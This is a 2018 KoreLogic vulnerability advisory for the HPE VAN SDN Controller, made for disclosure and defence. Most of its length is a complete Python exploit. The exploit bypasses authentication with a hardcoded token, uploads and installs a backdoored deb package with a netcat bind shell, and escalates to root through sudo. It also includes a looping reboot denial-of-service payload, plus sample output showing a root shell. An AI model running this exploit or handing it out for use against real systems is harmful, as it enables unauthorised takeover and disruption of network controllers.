KL-001-2018-008 : HPE VAN SDN Unauthenticated Remote Root Vulnerability Title: HPE VAN SDN Unauthenticated Remote Root Vulnerability Advisory ID: KL-001-2018-008 Publication Date: 2018.06.25 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt 1. Vulnerability Details Affected Vendor: HP Enterprise Affected Product: VAN SDN Controller Affected Version: Platform: Embedded Linux CWE Classification: CWE-798: Use of Hard-coded Credentials, CWE-20: Improper Input Validation Impact: Privilege Escalation Attack vector: HTTP 2. Vulnerability Description A hardcoded service token can be used to bypass authentication. Built-in functionality can be exploited to deploy and execute a malicious deb file containing a backdoor. A weak sudoers configuration can then be abused to escalate privileges to root. A second issue can be used to deny use of the appliance by continually rebooting it. 3. Technical Description The exploit will automatically attempt to bypass authentication unless the --no-auth-bypass flag is provided. If that flag is provided, the --username and --password flags must also be given. The options for the --payload flag are: rce-root and pulse-reboot. The default option is rce-root. The pulse-reboot payload will reboot the target device until the attack is stopped. $ python hpevansdn-multiple_exploits.py --help HPE VAN SDN Controller Unauthenticated Remote Root and Denial-of-Service Usage: hpevansdn-multiple_exploits.py [options] Options: -h, --help show this help message and exit --target=REMOTE_IP Target IP address --no-auth-bypass No authentication bypass --username=USERNAME Username (Default: sdn) --password=PASSWORD Password (Default: skyline) --payload=PAYLOAD Payload: rce-root(default), pulse-reboot Below is output for the rce-root payload: $ python hpevansdn-multiple_exploits.py --target HPE VAN SDN Controller Unauthenticated Remote Root and Denial-of-Service [+] Authentication successfully bypassed. [-] Starting remote root exploit. [-] Building backdoor. [-] Uploading backdoor. [+] Upload successful. [-] Installing backdoor. [+] Starting backdoor on port 49370. [+] Connected to backdoor. * For interactive root shell please run /var/lib/sdn/uploads/root-V6mlQNqW id uid=108(sdnadmin) gid=1000(sdn) groups=1000(sdn) /var/lib/sdn/uploads/root-V6mlQNqW root@medium-hLinux:/opt/sdn/admin# uname -a Linux medium-hLinux 4.4.0-2-amd64-hlinux #hlinux1 SMP Thu Jan 28 12:35:26 UTC 2016 x86_64 GNU/Linux root@medium-hLinux:/opt/sdn/admin# exit [-] Removing backdoor. [+] Backdoor removed. 4. Mitigation and Remediation Recommendation The vendor issued the following statement: HPE had evaluated the impact of service token being leaked and previously updated the security procedure in VAN 2.8.8 Admin Guide page 129. The full guide is here - http://h20628.www2.hp.com/km-ext/kmcsdirect/emr_na-a00003662en_us-1.pdf. HPE expects all customers to update their service token, admin token, default sdn user password, and edit iptables as described in the guideline. If the guideline was followed, the exploit would not be successful. 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2018.02.16 - KoreLogic submits vulnerability details to HPE. 2018.02.16 - HPE acknowledges receipt. 2018.04.02 - 30 business days have elapsed since the vulnerability was reported to HPE. 2018.04.23 - 45 business days have elapsed since the vulnerability was reported to HPE. 2018.05.04 - KoreLogic requests an update on the status of the remediation. 2018.05.14 - 60 business days have elapsed since the vulnerability was reported to HPE. 2018.06.05 - 75 business days have elapsed since the vulnerability was reported to HPE. 2018.06.11 - KoreLogic requests an update on the status of the remediation. 2018.06.12 - HPE responds with the statement documented in Section 4. Mitigation and Remediation Recommendation. 2018.06.25 - KoreLogic public disclosure. 7. Proof of Concept from optparse import OptionParser from random import randrange,choice from threading import Thread from os import mkdir,makedirs,system,listdir,remove from string import ascii_letters,digits from subprocess import check_output from requests import get,post from requests.utils import dict_from_cookiejar from requests.exceptions import ConnectionError from time import sleep from sys import exit from json import dumps ################################# # PULSE REBOOT TIMER IN SECONDS # pulse_timer = 60 # ################################# banner = """HPE VAN SDN Controller Unauthenticated Remote Root and Denial-of-Service """.center(80) class Backdoor: def __init__(self): ###################################################################################### # ATTACK SHELL SCRIPT # self.backdoor_port = randrange(50000,55000) # self.backdoor_script = """#!/bin/sh\nnc -l -p PORT -e /bin/bash &""" # DONT CHANGE # self.backdoor_dir = '%s-1.0.0' % ''.join( # [choice(digits + ascii_letters) for i in xrange(8)] # ) # self.backdoor_script = self.backdoor_script.replace('PORT',str(self.backdoor_port)) # ###################################################################################### self.cmd_name = ''.join([choice(digits + ascii_letters) for i in xrange(8)]) return None def generate(self): print '[-] Building backdoor.' control_template = """Source: %s Section: misc Priority: extra Maintainer: None Homepage: Version: 1.0.0 Package: %s Architecture: all Depends: Description: %s """ % (self.backdoor_dir,self.cmd_name,self.backdoor_dir) try: mkdir(self.backdoor_dir) mkdir('%s/%s' % (self.backdoor_dir,'DEBIAN')) fp = open('%s/%s/control' % (self.backdoor_dir,'DEBIAN'),'w') fp.write(control_template) fp.close() makedirs('%s/var/lib/sdn/uploads/tmp' % (self.backdoor_dir)) fp = open('%s/var/lib/sdn/uploads/tmp/%s' % (self.backdoor_dir,self.cmd_name),'w') fp.write(self.backdoor_script) fp.close() fp = open('%s/var/lib/sdn/uploads/root-%s' % (self.backdoor_dir,self.cmd_name),'w') fp.write("""#!/bin/sh\nsudo -u sdn /usr/bin/sudo python -c 'import pty;pty.spawn("/bin/bash")'""") fp.close() system('chmod a+x %s/var/lib/sdn/uploads/tmp/%s' % (self.backdoor_dir,self.cmd_name)) system('chmod a+x %s/var/lib/sdn/uploads/root-%s' % (self.backdoor_dir,self.cmd_name)) if "dpkg-deb: building package" not in check_output( ['/usr/bin/dpkg-deb', '--build', '%s/' % (self.backdoor_dir)] ): print '[!] Could not build attack deb file. Reason: DPKG failure.' except Exception as e: print '[!] Could not build attack deb file. Reason: %s.' % (e) return '%s.deb' % self.backdoor_dir,self.cmd_name,self.backdoor_port class HTTP: def __init__(self): return None def is_service_token_enabled(self): url = 'https://%s:8443/sdn/ui/app/rs/hpws/config' % (self.target) try: r = get(url, headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent}, verify=False, allow_redirects=False) if r.status_code == 200: return True except ConnectionError: print '[!] Connection to target service failed.' exit(1) return False def get_session_token(self): url = 'https://%s:8443/sdn/ui/app/login' % (self.target) try: r = post(url, headers={"User-Agent":self.user_agent},verify=False, data="username=%s&password=%s" % (self.username,self.password), allow_redirects=False) if r.status_code == 303: self.session_token = dict_from_cookiejar(r.cookies)['X-Auth-Token'] return True except ConnectionError: print '[!] Connection to target service failed.' exit(1) return False def upload_deb(self): print '[-] Uploading backdoor.' url = 'https://%s:8081/upload' % (self.target) try: fp = open('%s' % (self.deb_name),'rb') data = fp.read() fp.close() try: r = post(url,headers={"X-Auth-Token":self.session_token,"Filename":self.deb_name,"User-Agent":self.user_agent},verify=False,data=data) if r.status_code == 200: print '[+] Upload successful.' return True else: print '[!] Upload failed. Please try again.' except ConnectionError: print '[!] Connection to target service failed.' exit(1) except Exception as e: print '[!] Failed to write backdoor to disk. Reason: %s.' % (e) return False def install_deb(self): print '[-] Installing backdoor.' url = 'https://%s:8081/' % (self.target) post_body = dumps({"action":"install","name":self.deb_name}) try: r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body) if r.status_code == 200: return True except ConnectionError: print '[!] Connection to target service failed.' exit(1) return False def start_shell(self): print '[+] Starting backdoor on port %d.' % (self.backdoor_port) url = 'https://%s:8081/' % (self.target) post_body = dumps({"action":"exec","name":self.cmd_name}) try: r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body) if r.status_code == 200: return True except ConnectionError: print '[!] Connection to target service failed.' exit(1) return False def uninstall_deb(self): print '[-] Removing backdoor.' url = 'https://%s:8081/' % (self.target) post_body = dumps({"action":"uninstall","name":self.deb_name}) try: r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body) if r.status_code == 200: return True except ConnectionError: print '[!] Connection to target service failed.' exit(1) return False def send_reboot(self): print '[+] Sending reboot.' url = 'https://%s:8081/' % (self.target) post_body = dumps({"action":"reboot"}) try: r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body) except ConnectionError: print '[!] Connection to target service failed.' exit(1) return False class Exploit(HTTP): def __init__(self,target=None,noauthbypass=None, username=None,password=None,payload=None): self.target = target self.noauthbypass = noauthbypass self.username = username self.password = password self.payload = payload self.deb_name = '' self.cmd_name = '' self.backdoor_port = 0 self.session_token = 'AuroraSdnToken37' self.user_agent = choice(['Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1', 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; SV1; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Ubuntu/10.10 Chromium/8.0.552.237 Chrome/8.0.552.237 Safari/534.10']) return None def drop_root(self): sleep(3) print '[+] Connected to backdoor.\n\t* For interactive root shell please run /var/lib/sdn/uploads/root-%s' % (self.cmd_name) system('nc %s %s' % (self.target,self.backdoor_port)) return False def run(self): if not self.is_service_token_enabled() or self.noauthbypass == True: print '[-] Authentication bypass failed or running with --no-auth-bypass. Attempting login.' if not self.get_session_token(): print '[!] Login failed. Exploit failed.' exit(1) else: print '[+] Authentication successfully bypassed.' if self.payload == 'rce-root': print '[-] Starting remote root exploit.' self.deb_name, self.cmd_name, self.backdoor_port = Backdoor().generate() if self.upload_deb(): if self.install_deb(): Thread(target=self.start_shell,args=(),name="shell-%s" % (self.cmd_name)).start() try: self.drop_root() except KeyboardInterrupt: print '[-] Disconnecting from backdoor.' return True if self.uninstall_deb(): print '[+] Backdoor removed.' else: print '[!] Could not remove backdoor.' return True else: print '[!] Failed to install backdoor.' exit(1) else: print '[!] Failed to upload backdoor.' exit(1) print "[-] Please remember to srm %s and the build directory %s/" % (self.deb_name,self.deb_name.replace('.deb','')) else: print '[-] Starting pulse reboot exploit.' while True: try: self.send_reboot() sleep(pulse_timer) except KeyboardInterrupt: print '[-] Reboot pulse Denial-of-Service stopped.' break return False if __name__=="__main__": print banner parser = OptionParser() parser.add_option("--target",dest="remote_ip",default='',help="Target IP address") parser.add_option("--no-auth-bypass",action="store_true",default=False,help="No authentication bypass") parser.add_option("--username",dest="username",default="sdn",help="Username (Default: sdn)") parser.add_option("--password",dest="password",default="skyline",help="Password (Default: skyline)") parser.add_option("--payload",dest="payload",default='rce-root',help="Payload: rce-root(default), pulse-reboot") o, a = parser.parse_args() if o.remote_ip != '': Exploit(target=o.remote_ip, noauthbypass=o.no_auth_bypass, username=o.username, password=o.password, payload=o.payload).run() else: print '[!] --target must be supplied.' The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
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